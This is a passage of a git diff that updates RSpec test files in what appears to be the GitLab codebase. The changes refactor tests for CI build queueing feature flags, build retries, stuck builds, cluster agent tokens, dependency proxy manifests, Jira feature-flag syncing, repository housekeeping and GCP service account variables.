tables decoupling disabled' do - before do - stub_feature_flags( - ci_pending_builds_project_runners_decoupling: false, - ci_queueing_builds_enabled_checks: false) - end - - around do |example| - allow_cross_joins_across_databases(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/332952') do - example.run - end - end - - it 'does not pick a build' do - expect(execute(specific_runner)).to be_nil - end - end - - context 'with tables decoupling enabled' do - before do - stub_feature_flags( - ci_pending_builds_project_runners_decoupling: true, - ci_queueing_builds_enabled_checks: true) - end - - it 'does not pick a build' do - expect(execute(specific_runner)).to be_nil - expect(pending_job.reload).to be_failed - expect(pending_job.queuing_entry).to be_nil - end + it 'does not pick a build' do + expect(execute(specific_runner)).to be_nil + expect(pending_job.reload).to be_failed + expect(pending_job.queuing_entry).to be_nil end end end @@ -272,34 +246,10 @@ module Ci context 'and uses project runner' do let(:build) { execute(specific_runner) } - context 'with tables decoupling disabled' do - before do - stub_feature_flags( - ci_pending_builds_project_runners_decoupling: false, - ci_queueing_builds_enabled_checks: false) - end - - around do |example| - allow_cross_joins_across_databases(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/332952') do - example.run - end - end - - it { expect(build).to be_nil } - end - - context 'with tables decoupling enabled' do - before do - stub_feature_flags( - ci_pending_builds_project_runners_decoupling: true, - ci_queueing_builds_enabled_checks: true) - end - - it 'does not pick a build' do - expect(build).to be_nil - expect(pending_job.reload).to be_failed - expect(pending_job.queuing_entry).to be_nil - end + it 'does not pick a build' do + expect(build).to be_nil + expect(pending_job.reload).to be_failed + expect(pending_job.queuing_entry).to be_nil end end end @@ -790,17 +740,17 @@ module Ci stub_feature_flags(ci_pending_builds_queue_source: true) end - context 'with ci_queueing_denormalize_shared_runners_information enabled' do + context 'with ci_queuing_use_denormalized_data_strategy enabled' do before do - stub_feature_flags(ci_queueing_denormalize_shared_runners_information: true) + stub_feature_flags(ci_queuing_use_denormalized_data_strategy: true) end include_examples 'handles runner assignment' end - context 'with ci_queueing_denormalize_shared_runners_information disabled' do + context 'with ci_queuing_use_denormalized_data_strategy disabled' do before do - stub_feature_flags(ci_queueing_denormalize_shared_runners_information: false) + stub_feature_flags(ci_queuing_use_denormalized_data_strategy: false) end around do |example| @@ -812,37 +762,9 @@ module Ci include_examples 'handles runner assignment' end - context 'with ci_queueing_denormalize_tags_information enabled' do - before do - stub_feature_flags(ci_queueing_denormalize_tags_information: true) - end - - include_examples 'handles runner assignment' - end - - context 'with ci_queueing_denormalize_tags_information disabled' do + context 'with ci_queuing_use_denormalized_data_strategy enabled' do before do - stub_feature_flags(ci_queueing_denormalize_tags_information: false) - end - - around do |example| - allow_cross_joins_across_databases(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/332952') do - example.run - end - end - - include_examples 'handles runner assignment' - end - - context 'with ci_queueing_denormalize_namespace_traversal_ids disabled' do - before do - stub_feature_flags(ci_queueing_denormalize_namespace_traversal_ids: false) - end - - around do |example| - allow_cross_joins_across_databases(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/332952') do - example.run - end + stub_feature_flags(ci_queuing_use_denormalized_data_strategy: true) end include_examples 'handles runner assignment' diff --git a/spec/services/ci/retry_build_service_spec.rb b/spec/services/ci/retry_build_service_spec.rb index 16635c64434..5d56084faa8 100644 --- a/spec/services/ci/retry_build_service_spec.rb +++ b/spec/services/ci/retry_build_service_spec.rb @@ -73,6 +73,8 @@ RSpec.describe Ci::RetryBuildService do scheduled_at: 10.seconds.since) end + let_it_be(:internal_job_variable) { create(:ci_job_variable, job: build) } + before_all do # Make sure that build has both `stage_id` and `stage` because FactoryBot # can reset one of the fields when assigning another. We plan to deprecate @@ -86,7 +88,7 @@ RSpec.describe Ci::RetryBuildService do file_type: file_type, job: build, expire_at: build.artifacts_expire_at) end - create(:ci_job_variable, job: build) + create(:ci_job_variable, :dotenv_source, job: build) create(:ci_build_need, build: build) create(:terraform_state_version, build: build) end @@ -125,6 +127,11 @@ RSpec.describe Ci::RetryBuildService do expect(new_build.needs_attributes).to match(build.needs_attributes) expect(new_build.needs).not_to match(build.needs) end + + it 'clones only internal job variables' do + expect(new_build.job_variables.count).to eq(1) + expect(new_build.job_variables).to contain_exactly(having_attributes(key: internal_job_variable.key, value: internal_job_variable.value)) + end end describe 'reject accessors' do @@ -147,7 +154,7 @@ RSpec.describe Ci::RetryBuildService do Ci::Build.attribute_names.map(&:to_sym) + Ci::Build.attribute_aliases.keys.map(&:to_sym) + Ci::Build.reflect_on_all_associations.map(&:name) + - [:tag_list, :needs_attributes] - + [:tag_list, :needs_attributes, :job_variables_attributes] - # ee-specific accessors should be tested in ee/spec/services/ci/retry_build_service_spec.rb instead described_class.extra_accessors - [:dast_site_profiles_build, :dast_scanner_profiles_build] # join tables @@ -310,7 +317,7 @@ RSpec.describe Ci::RetryBuildService do expect(build).to be_processed end - context 'when build with deployment is retried' do + shared_examples_for 'when build with deployment is retried' do let!(:build) do create(:ci_build, :with_deployment, :deploy_to_production, pipeline: pipeline, stage_id: stage.id, project: project) @@ -329,7 +336,7 @@ RSpec.describe Ci::RetryBuildService do end end - context 'when build with dynamic environment is retried' do + shared_examples_for 'when build with dynamic environment is retried' do let_it_be(:other_developer) { create(:user).tap { |u| project.add_developer(other_developer) } } let(:environment_name) { 'review/$CI_COMMIT_REF_SLUG-$GITLAB_USER_ID' } @@ -356,6 +363,18 @@ RSpec.describe Ci::RetryBuildService do end end + it_behaves_like 'when build with deployment is retried' + it_behaves_like 'when build with dynamic environment is retried' + + context 'when create_deployment_in_separate_transaction feature flag is disabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + + it_behaves_like 'when build with deployment is retried' + it_behaves_like 'when build with dynamic environment is retried' + end + context 'when build has needs' do before do create(:ci_build_need, build: build, name: 'build1') diff --git a/spec/services/ci/stuck_builds/drop_pending_service_spec.rb b/spec/services/ci/stuck_builds/drop_pending_service_spec.rb index aa0526edf57..ebc57af77a0 100644 --- a/spec/services/ci/stuck_builds/drop_pending_service_spec.rb +++ b/spec/services/ci/stuck_builds/drop_pending_service_spec.rb @@ -3,8 +3,12 @@ require 'spec_helper' RSpec.describe Ci::StuckBuilds::DropPendingService do - let!(:runner) { create :ci_runner } - let!(:job) { create :ci_build, runner: runner } + let_it_be(:runner) { create(:ci_runner) } + let_it_be(:pipeline) { create(:ci_empty_pipeline) } + let_it_be_with_reload(:job) do + create(:ci_build, pipeline: pipeline, runner: runner) + end + let(:created_at) { } let(:updated_at) { } @@ -14,6 +18,8 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do job_attributes = { status: status } job_attributes[:created_at] = created_at if created_at job_attributes[:updated_at] = updated_at if updated_at + job_attributes.compact! + job.update!(job_attributes) end @@ -41,12 +47,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is dropped with failure reason', 'stuck_or_timeout_failure' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end context 'when job was updated less than 1 day ago' do @@ -63,12 +63,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is unchanged' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end context 'when job was updated more than 1 hour ago' do @@ -85,12 +79,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is unchanged' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end end @@ -115,12 +103,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is dropped with failure reason', 'stuck_or_timeout_failure' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end context 'when job was updated in less than 1 hour ago' do @@ -137,12 +119,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is unchanged' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end end end @@ -179,12 +155,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is unchanged' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end end diff --git a/spec/services/ci/update_pending_build_service_spec.rb b/spec/services/ci/update_pending_build_service_spec.rb index d36564938c8..2bb0aded24a 100644 --- a/spec/services/ci/update_pending_build_service_spec.rb +++ b/spec/services/ci/update_pending_build_service_spec.rb @@ -43,9 +43,9 @@ RSpec.describe Ci::UpdatePendingBuildService do expect(pending_build_2.instance_runners_enabled).to be_truthy end - context 'when ci_pending_builds_maintain_shared_runners_data is disabled' do + context 'when ci_pending_builds_maintain_denormalized_data is disabled' do before do - stub_feature_flags(ci_pending_builds_maintain_shared_runners_data: false) + stub_feature_flags(ci_pending_builds_maintain_denormalized_data: false) end it 'does not update all pending builds', :aggregate_failures do @@ -67,9 +67,9 @@ RSpec.describe Ci::UpdatePendingBuildService do expect(pending_build_2.instance_runners_enabled).to be_truthy end - context 'when ci_pending_builds_maintain_shared_runners_data is disabled' do + context 'when ci_pending_builds_maintain_denormalized_data is disabled' do before do - stub_feature_flags(ci_pending_builds_maintain_shared_runners_data: false) + stub_feature_flags(ci_pending_builds_maintain_denormalized_data: false) end it 'does not update all pending builds', :aggregate_failures do diff --git a/spec/services/clusters/agent_tokens/create_service_spec.rb b/spec/services/clusters/agent_tokens/create_service_spec.rb index 92629af06c8..dc7abd1504b 100644 --- a/spec/services/clusters/agent_tokens/create_service_spec.rb +++ b/spec/services/clusters/agent_tokens/create_service_spec.rb @@ -47,6 +47,21 @@ RSpec.describe Clusters::AgentTokens::CreateService do expect(token.name).to eq(params[:name]) end + it 'creates an activity event' do + expect { subject }.to change { ::Clusters::Agents::ActivityEvent.count }.by(1) + + token = subject.payload[:token].reload + event = cluster_agent.activity_events.last + + expect(event).to have_attributes( + kind: 'token_created', + level: 'info', + recorded_at: token.created_at, + user: token.created_by_user, + agent_token: token + ) + end + context 'when params are invalid' do let(:params) { { agent_id: 'bad_id' } } @@ -54,6 +69,10 @@ RSpec.describe Clusters::AgentTokens::CreateService do expect { subject }.not_to change(::Clusters::AgentToken, :count) end + it 'does not create an activity event' do + expect { subject }.not_to change { ::Clusters::Agents::ActivityEvent.count } + end + it 'returns validation errors', :aggregate_failures do expect(subject.status).to eq(:error) expect(subject.message).to eq(["Agent must exist", "Name can't be blank"]) diff --git a/spec/services/clusters/cleanup/project_namespace_service_spec.rb b/spec/services/clusters/cleanup/project_namespace_service_spec.rb index ec510b2e3c5..8d3ae217a9f 100644 --- a/spec/services/clusters/cleanup/project_namespace_service_spec.rb +++ b/spec/services/clusters/cleanup/project_namespace_service_spec.rb @@ -95,5 +95,31 @@ RSpec.describe Clusters::Cleanup::ProjectNamespaceService do subject end end + + context 'when there is a Kubeclient::HttpError' do + let(:kubeclient_instance_double) do + instance_double(Gitlab::Kubernetes::KubeClient) + end + + ['Unauthorized', 'forbidden', 'Certificate verify Failed'].each do |message| + it 'schedules ::ServiceAccountWorker with accepted errors' do + allow(kubeclient_instance_double) + .to receive(:delete_namespace) + .and_raise(Kubeclient::HttpError.new(401, message, nil)) + + expect(Clusters::Cleanup::ServiceAccountWorker).to receive(:perform_async).with(cluster.id) + + subject + end + end + + it 'raises error with unaccepted errors' do + allow(kubeclient_instance_double) + .to receive(:delete_namespace) + .and_raise(Kubeclient::HttpError.new(401, 'unexpected message', nil)) + + expect { subject }.to raise_error(Kubeclient::HttpError) + end + end end end diff --git a/spec/services/clusters/cleanup/service_account_service_spec.rb b/spec/services/clusters/cleanup/service_account_service_spec.rb index adcdbd84da0..769762237f9 100644 --- a/spec/services/clusters/cleanup/service_account_service_spec.rb +++ b/spec/services/clusters/cleanup/service_account_service_spec.rb @@ -52,5 +52,19 @@ RSpec.describe Clusters::Cleanup::ServiceAccountService do expect { subject }.to change { Clusters::Cluster.where(id: cluster.id).exists? }.from(true).to(false) end end + + context 'when there is a Kubeclient::HttpError' do + ['Unauthorized', 'forbidden', 'Certificate verify Failed'].each do |message| + before do + allow(kubeclient_instance_double) + .to receive(:delete_service_account) + .and_raise(Kubeclient::HttpError.new(401, message, nil)) + end + + it 'destroys cluster' do + expect { subject }.to change { Clusters::Cluster.where(id: cluster.id).exists? }.from(true).to(false) + end + end + end end end diff --git a/spec/services/clusters/integrations/prometheus_health_check_service_spec.rb b/spec/services/clusters/integrations/prometheus_health_check_service_spec.rb index 9db3b9d2417..7147f1b9b28 100644 --- a/spec/services/clusters/integrations/prometheus_health_check_service_spec.rb +++ b/spec/services/clusters/integrations/prometheus_health_check_service_spec.rb @@ -58,7 +58,7 @@ RSpec.describe Clusters::Integrations::PrometheusHealthCheckService, '#execute' let(:prometheus_enabled) { true } before do - client = instance_double('PrometheusClient', healthy?: client_healthy) + client = instance_double('Gitlab::PrometheusClient', healthy?: client_healthy) expect(prometheus).to receive(:prometheus_client).and_return(client) end diff --git a/spec/services/concerns/audit_event_save_type_spec.rb b/spec/services/concerns/audit_event_save_type_spec.rb new file mode 100644 index 00000000000..fbaebd9f85c --- /dev/null +++ b/spec/services/concerns/audit_event_save_type_spec.rb @@ -0,0 +1,28 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe AuditEventSaveType do + subject(:target) { Object.new.extend(described_class) } + + describe '#should_save_database? and #should_save_stream?' do + using RSpec::Parameterized::TableSyntax + + where(:query_method, :query_param, :result) do + :should_save_stream? | :stream | true + :should_save_stream? | :database_and_stream | true + :should_save_database? | :database | true + :should_save_database? | :database_and_stream | true + :should_save_stream? | :database | false + :should_save_stream? | nil | false + :should_save_database? | :stream | false + :should_save_database? | nil | false + end + + with_them do + it 'returns corresponding results according to the query_method and query_param' do + expect(target.send(query_method, query_param)).to eq result + end + end + end +end diff --git a/spec/services/dependency_proxy/find_or_create_manifest_service_spec.rb b/spec/services/dependency_proxy/find_cached_manifest_service_spec.rb index ef608c9b113..29bdf1f11c3 100644 --- a/spec/services/dependency_proxy/find_or_create_manifest_service_spec.rb +++ b/spec/services/dependency_proxy/find_cached_manifest_service_spec.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true require 'spec_helper' -RSpec.describe DependencyProxy::FindOrCreateManifestService do +RSpec.describe DependencyProxy::FindCachedManifestService do include DependencyProxyHelpers let_it_be(:image) { 'alpine' } @@ -49,14 +49,6 @@ RSpec.describe DependencyProxy::FindOrCreateManifestService do end it_behaves_like 'returning no manifest' - - context 'with dependency_proxy_manifest_workhorse feature disabled' do - before do - stub_feature_flags(dependency_proxy_manifest_workhorse: false) - end - - it_behaves_like 'downloading the manifest' - end end context 'failed head request' do @@ -66,14 +58,6 @@ RSpec.describe DependencyProxy::FindOrCreateManifestService do end it_behaves_like 'returning no manifest' - - context 'with dependency_proxy_manifest_workhorse feature disabled' do - before do - stub_feature_flags(dependency_proxy_manifest_workhorse: false) - end - - it_behaves_like 'downloading the manifest' - end end end @@ -105,20 +89,6 @@ RSpec.describe DependencyProxy::FindOrCreateManifestService do end it_behaves_like 'returning no manifest' - - context 'with dependency_proxy_manifest_workhorse feature disabled' do - before do - stub_feature_flags(dependency_proxy_manifest_workhorse: false) - end - - it 'downloads the new manifest and updates the existing record', :aggregate_failures do - expect(subject[:status]).to eq(:success) - expect(subject[:manifest]).to eq(dependency_proxy_manifest) - expect(subject[:manifest].content_type).to eq(content_type) - expect(subject[:manifest].digest).to eq(digest) - expect(subject[:from_cache]).to eq false - end - end end context 'when the cached manifest is expired' do @@ -129,14 +99,6 @@ RSpec.describe DependencyProxy::FindOrCreateManifestService do end it_behaves_like 'returning no manifest' - - context 'with dependency_proxy_manifest_workhorse feature disabled' do - before do - stub_feature_flags(dependency_proxy_manifest_workhorse: false) - end - - it_behaves_like 'downloading the manifest' - end end context 'failed connection' do diff --git a/spec/services/dependency_proxy/pull_manifest_service_spec.rb b/spec/services/dependency_proxy/pull_manifest_service_spec.rb deleted file mode 100644 index 6018a3229fb..00000000000 --- a/spec/services/dependency_proxy/pull_manifest_service_spec.rb +++ /dev/null @@ -1,77 +0,0 @@ -# frozen_string_literal: true -require 'spec_helper' - -RSpec.describe DependencyProxy::PullManifestService do - include DependencyProxyHelpers - - let(:image) { 'alpine' } - let(:tag) { '3.9' } - let(:token) { Digest::SHA256.hexdigest('123') } - let(:manifest) { { foo: 'bar' }.to_json } - let(:digest) { '12345' } - let(:content_type) { 'foo' } - let(:headers) do - { DependencyProxy::Manifest::DIGEST_HEADER => digest, 'content-type' => content_type } - end - - subject { described_class.new(image, tag, token).execute_with_manifest(&method(:check_response)) } - - context 'remote request is successful' do - before do - stub_manifest_download(image, tag, headers: headers) - end - - it 'successfully returns the manifest' do - def check_response(response) - response[:file].rewind - - expect(response[:status]).to eq(:success) - expect(response[:file].read).to eq(manifest) - expect(response[:digest]).to eq(digest) - expect(response[:content_type]).to eq(content_type) - end - - subject - end - end - - context 'remote request is not found' do - before do - stub_manifest_download(image, tag, status: 404, body: 'Not found') - end - - it 'returns a 404 not found error' do - def check_response(response) - expect(response[:status]).to eq(:error) - expect(response[:http_status]).to eq(404) - expect(response[:message]).to eq('Not found') - end - - subject - end - end - - context 'net timeout exception' do - before do - manifest_link = DependencyProxy::Registry.manifest_url(image, tag) - - stub_full_request(manifest_link).to_timeout - end - - it 'returns a 599 error' do - def check_response(response) - expect(response[:status]).to eq(:error) - expect(response[:http_status]).to eq(599) - expect(response[:message]).to eq('execution expired') - end - - subject - end - end - - context 'no block is given' do - subject { described_class.new(image, tag, token).execute_with_manifest } - - it { expect { subject }.to raise_error(ArgumentError, 'Block must be provided') } - end -end diff --git a/spec/services/deployments/older_deployments_drop_service_spec.rb b/spec/services/deployments/older_deployments_drop_service_spec.rb index e6fd6725d7d..d9a512a5dd2 100644 --- a/spec/services/deployments/older_deployments_drop_service_spec.rb +++ b/spec/services/deployments/older_deployments_drop_service_spec.rb @@ -70,6 +70,8 @@ RSpec.describe Deployments::OlderDeploymentsDropService do let(:older_deployment) { create(:deployment, :created, environment: environment, deployable: build) } let(:build) { create(:ci_build, :manual) } + # Manual jobs should not be accounted as outdated deployment jobs. + # See https://gitlab.com/gitlab-org/gitlab/-/issues/255978 for more information. it 'does not drop any builds nor track the exception' do expect(Gitlab::ErrorTracking).not_to receive(:track_exception) diff --git a/spec/services/events/destroy_service_spec.rb b/spec/services/events/destroy_service_spec.rb new file mode 100644 index 00000000000..8dcbb83eb1d --- /dev/null +++ b/spec/services/events/destroy_service_spec.rb @@ -0,0 +1,50 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Events::DestroyService do + subject(:service) { described_class.new(project) } + + let_it_be(:project, reload: true) { create(:project, :repository) } + let_it_be(:another_project) { create(:project) } + let_it_be(:merge_request) { create(:merge_request, source_project: project) } + let_it_be(:user) { create(:user) } + + let!(:unrelated_event) { create(:event, :merged, project: another_project, target: another_project, author: user) } + + before do + create(:event, :created, project: project, target: project, author: user) + create(:event, :created, project: project, target: merge_request, author: user) + create(:event, :merged, project: project, target: merge_request, author: user) + end + + let(:events) { project.events } + + describe '#execute', :aggregate_failures do + it 'deletes the events' do + response = nil + + expect { response = subject.execute }.to change(Event, :count).by(-3) + + expect(response).to be_success + expect(unrelated_event.reload).to be_present + end + + context 'when an error is raised while deleting the records' do + before do + allow(project).to receive_message_chain(:events, :all, :delete_all).and_raise(ActiveRecord::ActiveRecordError) + end + + it 'returns error' do + response = subject.execute + + expect(response).to be_error + expect(response.message).to eq 'Failed to remove events.' + end + + it 'does not delete events' do + expect { subject.execute }.not_to change(Event, :count) + end + end + end +end diff --git a/spec/services/feature_flags/create_service_spec.rb b/spec/services/feature_flags/create_service_spec.rb index 5a517ce6a64..e37d41562f9 100644 --- a/spec/services/feature_flags/create_service_spec.rb +++ b/spec/services/feature_flags/create_service_spec.rb @@ -62,10 +62,24 @@ RSpec.describe FeatureFlags::CreateService do expect { subject }.to change { Operations::FeatureFlag.count }.by(1) end - it 'syncs the feature flag to Jira' do - expect(::JiraConnect::SyncFeatureFlagsWorker).to receive(:perform_async).with(Integer, Integer) + context 'when Jira Connect subscription does not exist' do + it 'does not sync the feature flag to Jira' do + expect(::JiraConnect::SyncFeatureFlagsWorker).not_to receive(:perform_async) - subject + subject + end + end + + context 'when Jira Connect subscription exists' do + before do + create(:jira_connect_subscription, namespace: project.namespace) + end + + it 'syncs the feature flag to Jira' do + expect(::JiraConnect::SyncFeatureFlagsWorker).to receive(:perform_async).with(Integer, Integer) + + subject + end end it 'creates audit event' do diff --git a/spec/services/feature_flags/update_service_spec.rb b/spec/services/feature_flags/update_service_spec.rb index 4858139d60a..abe0112b27e 100644 --- a/spec/services/feature_flags/update_service_spec.rb +++ b/spec/services/feature_flags/update_service_spec.rb @@ -27,10 +27,24 @@ RSpec.describe FeatureFlags::UpdateService do expect(subject[:status]).to eq(:success) end - it 'syncs the feature flag to Jira' do - expect(::JiraConnect::SyncFeatureFlagsWorker).to receive(:perform_async).with(Integer, Integer) + context 'when Jira Connect subscription does not exist' do + it 'does not sync the feature flag to Jira' do + expect(::JiraConnect::SyncFeatureFlagsWorker).not_to receive(:perform_async) + + subject + end + end - subject + context 'when Jira Connect subscription exists' do + before do + create(:jira_connect_subscription, namespace: project.namespace) + end + + it 'syncs the feature flag to Jira' do + expect(::JiraConnect::SyncFeatureFlagsWorker).to receive(:perform_async).with(Integer, Integer) + + subject + end end it 'creates audit event with correct message' do diff --git a/spec/services/git/branch_push_service_spec.rb b/spec/services/git/branch_push_service_spec.rb index d70e458ba5e..5a637b0956b 100644 --- a/spec/services/git/branch_push_service_spec.rb +++ b/spec/services/git/branch_push_service_spec.rb @@ -554,44 +554,6 @@ RSpec.describe Git::BranchPushService, services: true do end end - describe "housekeeping", :clean_gitlab_redis_cache, :clean_gitlab_redis_queues, :clean_gitlab_redis_shared_state do - let(:housekeeping) { Repositories::HousekeepingService.new(project) } - - before do - allow(Repositories::HousekeepingService).to receive(:new).and_return(housekeeping) - end - - it 'does not perform housekeeping when not needed' do - expect(housekeeping).not_to receive(:execute) - - execute_service(project, user, oldrev: oldrev, newrev: newrev, ref: ref) - end - - context 'when housekeeping is needed' do - before do - allow(housekeeping).to receive(:needed?).and_return(true) - end - - it 'performs housekeeping' do - expect(housekeeping).to receive(:execute) - - execute_service(project, user, oldrev: oldrev, newrev: newrev, ref: ref) - end - - it 'does not raise an exception' do - allow(housekeeping).to receive(:try_obtain_lease).and_return(false) - - execute_service(project, user, oldrev: oldrev, newrev: newrev, ref: ref) - end - end - - it 'increments the push counter' do - expect(housekeeping).to receive(:increment!) - - execute_service(project, user, oldrev: oldrev, newrev: newrev, ref: ref) - end - end - describe "CI environments" do context 'create branch' do let(:oldrev) { blankrev } diff --git a/spec/services/git/process_ref_changes_service_spec.rb b/spec/services/git/process_ref_changes_service_spec.rb index 2a223091d0c..f52df9b0073 100644 --- a/spec/services/git/process_ref_changes_service_spec.rb +++ b/spec/services/git/process_ref_changes_service_spec.rb @@ -161,6 +161,50 @@ RSpec.describe Git::ProcessRefChangesService do end end end + + describe "housekeeping", :clean_gitlab_redis_cache, :clean_gitlab_redis_queues, :clean_gitlab_redis_shared_state do + let(:housekeeping) { Repositories::HousekeepingService.new(project) } + + before do + allow(Repositories::HousekeepingService).to receive(:new).and_return(housekeeping) + + allow(push_service_class) + .to receive(:new) + .with(project, project.owner, hash_including(execute_project_hooks: true, create_push_event: true)) + .exactly(changes.count).times + .and_return(service) + end + + it 'does not perform housekeeping when not needed' do + expect(housekeeping).not_to receive(:execute) + + subject.execute + end + + context 'when housekeeping is needed' do + before do + allow(housekeeping).to receive(:needed?).and_return(true) + end + + it 'performs housekeeping' do + expect(housekeeping).to receive(:execute) + + subject.execute + end + + it 'does not raise an exception' do + allow(housekeeping).to receive(:try_obtain_lease).and_return(false) + + subject.execute + end + end + + it 'increments the push counter' do + expect(housekeeping).to receive(:increment!) + + subject.execute + end + end end context 'branch changes' do diff --git a/spec/services/google_cloud/service_accounts_service_spec.rb b/spec/services/google_cloud/service_accounts_service_spec.rb index a0d09affa72..505c623c02a 100644 --- a/spec/services/google_cloud/service_accounts_service_spec.rb +++ b/spec/services/google_cloud/service_accounts_service_spec.rb @@ -3,11 +3,11 @@ require 'spec_helper' RSpec.describe GoogleCloud::ServiceAccountsService do - let_it_be(:project) { create(:project) } - let(:service) { described_class.new(project) } describe 'find_for_project' do + let_it_be(:project) { create(:project) } + context 'when a project does not have GCP service account vars' do before do project.variables.build(key: 'blah', value: 'foo', environment_scope: 'world') @@ -21,13 +21,13 @@ RSpec.describe GoogleCloud::ServiceAccountsService do context 'when a project has GCP service account ci vars' do before do - project.variables.build(environment_scope: '*', key: 'GCP_PROJECT_ID', value: 'prj1') - project.variables.build(environment_scope: '*', key: 'GCP_SERVICE_ACCOUNT_KEY', value: 'mock') - project.variables.build(environment_scope: 'staging', key: 'GCP_PROJECT_ID', value: 'prj2') - project.variables.build(environment_scope: 'staging', key: 'GCP_SERVICE_ACCOUNT', value: 'mock') - project.variables.build(environment_scope: 'production', key: 'GCP_PROJECT_ID', value: 'prj3') - project.variables.build(environment_scope: 'production', key: 'GCP_SERVICE_ACCOUNT', value: 'mock') - project.variables.build(environment_scope: 'production', key: 'GCP_SERVICE_ACCOUNT_KEY', value: 'mock') + project.variables.build(protected: true, environment_scope: '*', key: 'GCP_PROJECT_ID', value: 'prj1') + project.variables.build(protected: true, environment_scope: '*', key: 'GCP_SERVICE_ACCOUNT_KEY', value: 'mock') + project.variables.build(protected: true, environment_scope: 'staging', key: 'GCP_PROJECT_ID', value: 'prj2') + project.variables.build(protected: true, environment_scope: 'staging', key: 'GCP_SERVICE_ACCOUNT', value: 'mock') + project.variables.build(protected: true, environment_scope: 'production', key: 'GCP_PROJECT_ID', value: 'prj3') + project.variables.build(protected: true, environment_scope: 'production', key: 'GCP_SERVICE_ACCOUNT', value: 'mock') + project.variables.build(protected: true, environment_scope: 'production', key: 'GCP_SERVICE_ACCOUNT_KEY', value: 'mock') project.save! end @@ -55,4 +55,55 @@ RSpec.describe GoogleCloud::ServiceAccountsService do end end end + + describe 'add_for_project' do + let_it_be(:project) { create(:project) } + + it 'saves GCP creds as project CI vars' do + service.add_for_project('env_1', 'gcp_prj_id_1', 'srv_acc_1', 'srv_acc_key_1') + service.add_for_project('env_2', 'gcp_prj_id_2', 'srv_acc_2', 'srv_acc_key_2') + + list = service.find_for_project + + aggregate_failures 'testing list of service accounts' do + expect(list.length).to eq(2) + + expect(list.first[:environment]).to eq('env_1') + expect(list.first[:gcp_project]).to eq('gcp_prj_id_1') + expect(list.first[:service_account_exists]).to eq(true) + expect(list.first[:service_account_key_exists]).to eq(true) + + expect(list.second[:environment]).to eq('env_2') + expect(list.second[:gcp_project]).to eq('gcp_prj_id_2') + expect(list.second[:service_account_exists]).to eq(true) + expect(list.second[:service_account_key_exists]).to eq(true) + end + end + + it 'replaces previously stored CI vars with new CI vars' do + service.add_for_project('env_1', 'new_project', 'srv_acc_1', 'srv_acc_key_1') + + list = service.find_for_project + + aggregate_failures 'testing list of service accounts' do + expect(list.length).to eq(2) + + # asserting that the first service account is replaced + expect(list.first[:environment]).to eq('env_1') + expect(list.first[:gcp_project]).to eq('new_project') + expect(list.first[:service_account_exists]).to eq(true) + expect(list.first[:service_account_key_exists]).to eq(true) + + expect(list.second[:environment]).to eq('env_2') + expect(list.second[:gcp_project]).to eq('gcp_prj_id_2') + expect(list.second[:service_account_exists]).to eq(true) + expect(list.second[:service_account_key_exists]).to eq(true) + end + end + + it 'underlying project CI vars must be protected' do + expect(project.variables.first.protected).to eq(true) + expect(project.variables.second.protected).to eq(true) + end + end end diff --git a/spec/services/groups/create_service_spec.rb b/spec/services/groups/create_service_spec.rb index 7ea08131419..81cab973b30 100644 --- a/spec/services/groups/create_service_spec.rb +++ b/spec/services/groups/create_service_spec.rb @@ -24,6 +24,16 @@ RSpec.describe Groups::CreateService, '#execute' do end end + context 'when `setup_for_company:true` is passed' do + let(:params) { group_params.merge(setup_for_company: true) } + let(:service) { described_class.new(user, params) } + let(:created_group) { service.execute } + + it 'creates group with the specified setup_for_company' do + expect(created_group.setup_for_company).to eq(true) + end + end + context 'creating a group with `default_branch_protection` attribute' do let(:params) { group_params.merge(default_branch_protection: Gitlab::Access::PROTECTION_NONE) } let(:service) { described_class.new(user, params) } diff --git a/spec/services/groups/transfer_service_spec.rb b/spec/services/groups/transfer_service_spec.rb index 35d46884f4d..3a696228382 100644 --- a/spec/services/groups/transfer_service_spec.rb +++ b/spec/services/groups/transfer_service_spec.rb @@ -792,7 +792,7 @@ RSpec.describe Groups::TransferService, :sidekiq_inline do end end - context 'when group has pending builds' do + context 'when group has pending builds', :sidekiq_inline do let_it_be(:project) { create(:project, :public, namespace: group.reload) } let_it_be(:other_project) { create(:project) } let_it_be(:pending_build) { create(:ci_pending_build, project: project) } diff --git a/spec/services/groups/update_shared_runners_service_spec.rb b/spec/services/groups/update_shared_runners_service_spec.rb index 53870e810b1..6e938984052 100644 --- a/spec/services/groups/update_shared_runners_service_spec.rb +++ b/spec/services/groups/update_shared_runners_service_spec.rb @@ -63,6 +63,8 @@ RSpec.describe Groups::UpdateSharedRunnersService do let_it_be(:pending_build_2) { create(:ci_pending_build, project: project, instance_runners_enabled: false) } it 'updates pending builds for the group' do + expect(::Ci::UpdatePendingBuildService).to receive(:new).and_call_original + subject expect(pending_build_1.reload.instance_runners_enabled).to be_truthy @@ -73,6 +75,8 @@ RSpec.describe 